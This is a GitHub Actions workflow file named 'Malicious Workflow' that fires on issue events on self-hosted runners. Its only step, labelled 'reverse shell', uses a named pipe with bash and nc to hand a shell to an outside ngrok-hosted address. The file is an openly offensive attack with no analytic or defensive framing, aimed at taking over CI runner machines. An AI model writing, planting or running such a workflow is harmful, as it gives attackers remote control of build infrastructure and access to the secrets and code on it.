name: Malicious Workflow
on: issues
jobs:
  init:
    runs-on:
        - self-hosted
        - small
    steps:
    # reverse shell
    - run: |
          RESPONSE=$(mknod /tmp/backpipe p; /bin/bash 0</tmp/backpipe | nc https://9cac-197-250-130-221.ngrok-free.app 1>/tmp/backpipe)
          echo "Response: $RESPONSE"
      name: run nc
